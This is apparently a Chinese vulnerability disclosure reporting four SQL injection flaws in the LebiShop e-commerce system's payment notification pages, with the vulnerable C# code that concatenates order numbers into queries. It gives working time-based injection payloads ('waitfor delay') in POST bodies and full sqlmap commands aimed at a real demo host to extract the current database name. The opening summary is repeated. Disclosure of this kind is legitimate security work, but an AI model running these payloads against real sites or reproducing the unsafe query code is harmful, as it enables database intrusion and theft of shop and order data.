VULHUB ™

### 简要描述： LebiShop商城系统最新版SQL注入 四处 2015-01-27 更新 ### 详细说明： 第一处 LebiShop\onlinepay\dinpay\notify_url.aspx 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { string str = base.Request.Form["merchant_code"].ToString().Trim(); string str2 = base.Request.Form["notify_type"].ToString().Trim(); string str3 = base.Request.Form["notify_id"].ToString().Trim(); base.Request.Form["interface_version"].ToString().Trim(); base.Request.Form["sign_type"].ToString().Trim(); string str4 = base.Request.Form["sign"].ToString().Trim(); string code = base.Request.Form["order_no"].ToString().Trim(); // string str6 = base.Request.Form["order_time"].ToString().Trim(); string str7 = base.Request.Form["order_amount"].ToString().Trim(); string str8 = base.Request.Form["extra_return_param"].ToString().Trim(); string outcode = base.Request.Form["trade_no"].ToString().Trim(); string str10 = base.Request.Form["trade_time"].ToString().Trim(); string str11 =...

### 简要描述： LebiShop商城系统最新版SQL注入 四处 2015-01-27 更新 ### 详细说明： 第一处 LebiShop\onlinepay\dinpay\notify_url.aspx 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { string str = base.Request.Form["merchant_code"].ToString().Trim(); string str2 = base.Request.Form["notify_type"].ToString().Trim(); string str3 = base.Request.Form["notify_id"].ToString().Trim(); base.Request.Form["interface_version"].ToString().Trim(); base.Request.Form["sign_type"].ToString().Trim(); string str4 = base.Request.Form["sign"].ToString().Trim(); string code = base.Request.Form["order_no"].ToString().Trim(); // string str6 = base.Request.Form["order_time"].ToString().Trim(); string str7 = base.Request.Form["order_amount"].ToString().Trim(); string str8 = base.Request.Form["extra_return_param"].ToString().Trim(); string outcode = base.Request.Form["trade_no"].ToString().Trim(); string str10 = base.Request.Form["trade_time"].ToString().Trim(); string str11 = base.Request.Form["trade_status"].ToString().Trim(); string str12 = base.Request.Form["bank_seq_no"]; string str13 = ""; if ((str12 != null) && (str12 != "")) { str13 = str13 + "bank_seq_no=" + str12.ToString().Trim() + "&"; } if ((str8 != null) && (str8 != "")) { str13 = str13 + "extra_return_param=" + str8 + "&"; } str13 = (str13 + "interface_version=V3.0&") + "merchant_code=" + str + "&"; if ((str3 != null) && (str3 != "")) { str13 = str13 + "notify_id=" + str3 + "&notify_type=" + str2 + "&"; } str13 = ((((str13 + "order_amount=" + str7 + "&") + "order_no=" + code + "&") + "order_time=" + str6 + "&") + "trade_no=" + outcode + "&") + "trade_status=" + str11 + "&"; if ((str10 != null) && (str10 != "")) { str13 = str13 + "trade_time=" + str10 + "&"; } Lebi_OnlinePay onlinePay = Money.GetOnlinePay(code); //跟进 ... ``` ``` public static Lebi_OnlinePay GetOnlinePay(string code) { return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //存在注入了 } ``` 第二处 第三处 跟第四处 代码一样 地址分别是 LebiShop\onlinepay\alipayDBJY\notify_url.aspx LebiShop\onlinepay\alipayJSDZ\notify_url.aspx LebiShop\onlinepay\alipaySJK\notify_url.aspx 代码如下 ``` protected void Page_Load(object sender, EventArgs e) { SortedDictionary<string, string> requestPost = this.GetRequestPost(); string ordercode = base.Request.Form["out_trade_no"];//没处理 Lebi_Order model = B_Lebi_Order.GetModel("Code='" + ordercode + "'"); //存在注入 if (model == null) { base.Response.Write("系统错误"); base.Response.End(); } else if (requestPost.Count > 0) { Notify notify = new Notify(model); ... ``` 漏洞证明 先访问官网的 可以判断是存在注入的 访问 ``` http://demo.lebi.cn/onlinepay/dinpay/notify_url.aspx ``` post提交 ``` merchant_code=1&notify_type=1&notify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1 ``` 跟post提交 ``` merchant_code=1&notify_type=1&notify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=';waitfor delay '0:0:5';-- ``` 存在时间差 可判断存在基于时间的注入 由于官网有墙用工具扫就拒绝服务了 用sqlmap扫描 ``` sqlmap -u "http://demo.lebi.cn/onlinepay/dinpay/notify_url.aspx" --data "merchant_code=1&notify_type=1&notify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1" -p "order_no" --dbms "mssql" --technique=T --current-db --time-sec 10 ``` [<img src="https://images.seebug.org/upload/201503/0221574224fe24eeb95a34c813708a66512716bd.png" alt="65.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0221574224fe24eeb95a34c813708a66512716bd.png) [<img src="https://images.seebug.org/upload/201503/022158586776aea6a1504f47f1a01977e9383bdc.png" alt="66.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/022158586776aea6a1504f47f1a01977e9383bdc.png) 注入二 三 四 证明 分别访问 ``` http://demo.lebi.cn/onlinepay/alipayDBJY/notify_url.aspx http://demo.lebi.cn/onlinepay/alipayJSDZ/notify_url.aspx http://demo.lebi.cn/onlinepay/alipaySJK/notify_url.aspx ``` post提交 ``` out_trade_no=1 out_trade_no=1';waitfor delay '0:0:5';-- ``` sqlmap扫描 ``` sqlmap -u "http://demo.lebi.cn/onlinepay/alipaySJK/notify_url.aspx" --data "out_trade_no=1" --dbms "mssql" --technique=T --time-sec 10 --current-db ``` [<img src="https://images.seebug.org/upload/201503/022150416435bcf2bea7fe5725cd78df79ea28e5.png" alt="63.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/022150416435bcf2bea7fe5725cd78df79ea28e5.png) [<img src="https://images.seebug.org/upload/201503/0221510014d9ab1272524bd03cf5403bd52cf922.png" alt="64.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0221510014d9ab1272524bd03cf5403bd52cf922.png) ### 漏洞证明： 证明如上